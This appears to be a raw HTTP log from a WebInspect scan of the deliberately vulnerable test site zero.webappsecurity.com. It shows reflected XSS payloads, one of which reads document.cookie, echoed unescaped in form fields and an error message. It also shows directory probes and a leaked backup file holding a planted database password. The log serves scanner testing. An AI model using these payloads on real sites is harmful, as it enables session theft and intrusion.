GET /join.asp?name=&email=>"><script>alert("XSS")</script>&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:31 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=">"><script>alert("XSS")</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
POST /pcomboindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Content-Length: 11
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
cboPage=pc1HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:18 GMT
X-Powered-By: ASP.NET
Location: p1.asp
Connection: Keep-Alive
Content-Length: 121
Content-Type: text/html
Cache-control: private
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>
GET /linking/link1/link2/link3/link4/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:28 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>GET /join.asp?name=&email=&surname=&house=&street=&address2=>"><script>alert('XSS')</script>&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:28 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=">"><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
POST /pcomboindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Content-Length: 11
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
cboPage=pc2HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:18 GMT
X-Powered-By: ASP.NET
Location: p2.asp
Connection: Keep-Alive
Content-Length: 121
Content-Type: text/html
Cache-control: private
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>
GET /login/login.asp?Action=Login&UserName=</textarea><script>alert('XSS')</script>&Password=333%2D333%2D3333test@test999.com HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login/login.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:53:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 363
Content-Type: text/html
Cache-control: private
<HTML>
<HEAD>
<BODY>
<h1>Invalid username: </textarea><script>alert('XSS')</script></h1>
<form action=login.asp method=get>
Please login:<br>
Username: <input type=text name=UserName><br>
Password: <input type=password name=Password><br>
<input type=submit value="Login"><br>
<input type=hidden name=Action value="Login"><br>
</form>
</BODY></HTML>
GET /join.asp?name=&email=&surname=&house=test@<script>alert(document.cookie)</script>.com&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:54:37 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4022
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE="test@<script>alert(document.cookie)</script>.com"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /admin/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:33 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>GET /include/common.inc HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:42:02 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:00 GMT
ETag: "be7c48f8a9dc11:8f6"
Content-Length: 15
my include fileGET /_vti_log/document.URL; HTTP/1.0
Referer: http://zero.webappsecurity.com:80/_vti_log/
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:44 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
GET /pindex.asp.bak HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:34:52 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:38:17 GMT
ETag: "208026c0a8dc11:8f6"
Content-Length: 2061
<html>
<body>
<!-- Hidden Reference comment: should find this file /test/hidden.txt -->
This page allows for testing of pareters.<br>
<br>
The first section shows how a combo box can be used to product optional pages<br>
<form action = pcomboindex.asp method=post>
<SELECT name=cboPage>
<OPTION selected value=pc1>Show Page One</OPTION>
<option value=pc2>Show Page Two</option>
<option value=pc3>Show page three</option>
</select><br>
<input type=submit value=Submit>
</form><br>
<hr>
<a href="plink.asp?a=b&c=12">Second section is link that passes parameters to a sub page</a><br>
<br>
<A href="error.html">My ERROR</A>
Third example allows the user to input values and then shows them on the following page<br>
<Form action="pformresults.asp" method=post>
First Name: <input type=text name=txtFirstName><br>
Last Name: <input type=text name=txtLastName><br>
<input type=hidden name=txtHidden value="This was hidden from the user">
<input type=hidden name=dbConnectString value="dbCCNumbers;uid=sa;password=scoobydo">
<input type=submit value="Show User Input results"><br>
</form><br>
<hr>
<form action="rootlogin.asp" method=post>
User Name:<input type=text name=txtName><br>
Pass phrase:<input type=text name=txtPassPhrase><br>
<input type=submit value="Login"><br>
</form>
<br>
False Keyword that should not be flagged: root:x:0:0:/root:/bin/sh
<br>
False Keyword that should not be flagged: An error has occurred
<br>
<br>
<br>
<A HREF="adcenter.cgi">Link to adcenter.cgi exploit - Should be flagged by SmartChecker</A>
<br>
<A HREF="/user/adcenter.cgi">Link to adcenter.cgi exploit - Should not be flagged due to not having keyword present</A>
<br>
<A HREF="/test/adcenter.cgi">Link to adcenter.cgi exploit - Should be flagged by Smartchecker(Note: No HTML present)</A>
<br>
<A HREF="/linking/index.htm">Several chained directories</A>
<br>
<A HREF="/cfmerror.html">Cold Fusion Error</A>
<br>
<A HREF="/admin/help.cgi">Help</A>
<br>
<A HREF="/aspnet.aspx">ASP.NET file</A>
</body>
</html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=1"style="background:url(javascript:alert('XSS'))"%20"&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:26 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4025
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE="1"style="background:url(javascript:alert('XSS'))" ""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
